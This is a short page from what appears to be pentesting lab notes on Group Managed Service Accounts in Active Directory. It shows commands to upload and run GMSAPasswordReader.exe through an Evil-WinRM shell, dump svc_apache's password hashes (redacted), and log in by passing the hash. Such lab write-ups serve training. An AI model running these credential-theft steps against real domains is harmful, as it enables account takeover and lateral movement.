GMSA

Group Managed Service Accounts (GMSA)

Group Managed Service Accounts provide a higher security option for non-interactive applications, services, processes, or tasks that run automatically but need a security credential.

These service accounts are given automatically-generated passwords. Given certain permissions, it is possible to retrieve these password hashes from Active Directory. To see what users or groups have permissions to do that for a given service account, we can look up the PrincipalsAllowedToRetrieveManagedPassword user property on the account.

https://github.com/CsEnox/tools/raw/main/GMSAPasswordReader.exe

*Evil-WinRM* PS C:\Users\enox\Desktop> upload GMSAPasswordReader.exe

*Evil-WinRM* PS C:\USers\enox\Documents> ./GMSAPasswordReader.exe --accountname svc_apache
Calculating hashes for Old Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : [REDACTED]
[*]       aes128_cts_hmac_sha1 : [REDACTED]
[*]       aes256_cts_hmac_sha1 : [REDACTED]
[*]       des_cbc_md5          : [REDACTED]

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : [REDACTED]
[*]       aes128_cts_hmac_sha1 : [REDACTED]
[*]       aes256_cts_hmac_sha1 : [REDACTED]
[*]       des_cbc_md5          : [REDACTED]

Current Value -> rc4_hmac

$ evil-winrm -u 'svc_apache$' -H [REDACTED]-i 192.168.147.165
PreviousMisconfigured LDAPNextMS17-010

Last updated